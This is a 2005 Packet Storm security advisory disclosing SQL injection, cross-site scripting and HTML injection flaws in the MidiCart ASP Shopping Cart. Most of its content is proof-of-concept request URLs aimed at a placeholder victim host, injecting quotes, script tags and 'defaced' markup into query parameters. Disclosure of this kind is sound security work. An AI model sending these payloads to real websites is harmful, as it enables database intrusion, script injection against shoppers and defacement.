midicartInject.txt

2005-09-07T00:00:00
ID PACKETSTORM:39843
Type packetstorm
Reporter John Cobb
Modified 2005-09-07T00:00:00

Description

                                        
                                            `Hello All,  
  
I have discovered a number of remote vulnerabilities in:  
  
MidiCart ASP Shopping Cart, Evaluation Version 7 & Standard & Pro  
  
Authors Site: http://www.midicart.com/  
  
+-[Examples:]--------------------------------------------------+  
  
  
[1]------------------------------------------------------------+  
  
Possible SQL Injection & Information Disclosure:  
  
http://www.victim.com/item_list.asp?maingroup='&secondgroup=CDROM  
http://www.victim.com/item_list.asp?maingroup=CDROM&secondgroup='  
http://www.victim.com/item_show.asp?code_no='  
http://www.victim.com/search_list.asp  
  
[2]------------------------------------------------------------+  
  
XSS:  
  
http://www.victim.com/item_list.asp?maingroup=<script>var%20xss=31337;alert(  
xss);</script>&secondgroup=CDROM  
http://www.victim.com/item_list.asp?maingroup=CDROM&secondgroup=<script>var%  
20xss=31337;alert(xss);</script>  
  
[2]------------------------------------------------------------+  
  
HTML Injection:  
  
http://www.victim.com/item_list.asp?maingroup=<h1>defaced!</h1>&secondgroup=  
CDROM  
http://www.victim.com/item_list.asp?maingroup=CDROM&secondgroup=<h1>defaced<  
h1>  
  
http://www.victim.com/item_list.asp?maingroup=<h1>hello</h1>&secondgroup=<h1  
>defaced<h1>  
  
  
+-[Notes:]-----------------------------------------------------+  
  
Vulnerabilities found on: 21/08/2005  
Author(s) Informed on: 21/08/2005  
Author(s) Response: NONE  
Author(s) Fix: NONE  
  
  
Regards  
  
John Cobb  
  
JohnC@NoBytes.com  
  
http://www.NoBytes.com  
  
  
  
`